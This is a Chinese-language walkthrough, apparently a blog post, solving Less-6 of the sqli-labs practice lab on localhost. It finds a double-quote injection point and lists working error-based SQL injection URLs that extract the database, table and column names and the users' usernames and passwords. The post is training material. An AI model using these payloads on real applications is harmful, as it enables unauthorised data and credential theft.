该题与less-5类似,只是注入点有点不同,解题方法一致。
less-5:https://blog.csdn.net/qq_46432288/article/details/109295457
判断注入点:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1 显示正确,you are in…
http://127.0.0.1/sqli-labs-master/Less-6/?id=1’ 显示正确
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" 显示错误,有错误提示
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" --+ 显示正确,可以很明显的知道原数据传入应该是”id”,因为有错误回显,所以通过错误注入来完成此题。布尔盲注太麻烦。
判断当前数据库:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat(database(),’/’,floor(rand(0)*2))x from information_schema.columns group by x --+ 错误回显中包含 security/1,这里我们可以推断出数据库为security。
获取该security数据库中的表:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),’/’,floor(rand(0)*2))x from information_schema.tables group by x --+
获取security数据库中users表的字段:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),’/’,floor(rand(0)*2))x from information_schema.columns group by x --+
获取security数据库中users表中username字段的信息:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select username from users limit 0,1),’/’,floor(rand(0)*2))x from security.users group by x --+
获取security数据库中users表中password字段的信息:
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat((select password from users limit 0,1),’/’,floor(rand(0)*2))x from security.users group by x --+
未完待续。。。